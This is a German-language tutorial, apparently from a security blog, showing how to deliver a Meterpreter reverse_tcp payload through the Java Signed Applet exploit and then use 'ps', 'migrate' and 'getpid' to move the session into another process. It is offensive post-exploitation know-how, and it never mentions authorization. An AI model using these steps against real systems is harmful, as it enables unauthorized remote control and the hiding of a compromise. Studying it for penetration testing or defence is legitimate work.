Meterpreter – Migrate

In unserem letzten Tutorial über Meterpreter haben wir Ihnen den Befehl „Migrate“ kurz vorgestellt. In diesem kleinen aber feinen Tutorial möchten wir Ihnen zeigen wie Sie den Befehl korrekt umsetzten.

Als Beispiel werden wir jetzt einfach wieder ein Angriff über „Java Signed Applet“ ausführen. Wie das funktioniert haben wir schon einmal erklärt. Nachdem der Exploit Java Signed Applet aufgesetzt wurde, müssen wir nur noch den Meterpreter Payload auswählen.

use payload/windows/meterpreter/reverse_tcp

Nehmen Sie dann dort alle Einstellungen vor. Falls Sie Schwierigkeiten haben, können Sie einfach beim „Java Signed Applet“ vorbeischauen, dort haben wir das schon einmal erklärt.

Am Ende müssen Sie den Angriff nur noch mit „Exploit“ starten.

Rufen Sie nachdem der Server erstellt wurde die Website auf.

Kommen wir nun zum eigentlichen und zwar zum „Migrate“ Befehl.

Um sich in einen Prozess zu Migrieren braucht man zuerst mal eine Übersicht von allen Prozessen. Das geht mit dem Befehl „ps„. Merken Sie sich dann die PID Nummer vom gewünschten Ziel Prozess. Geben Sie dann ein „migrate <PID>“, natürlich ohne diese „<“ Klammern. Überprüfen Sie ob es geklappt hat mit dem Befehl „getpid„. Sollte alles geklappt haben sollte dort dann die neue PID Nummer erscheinen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.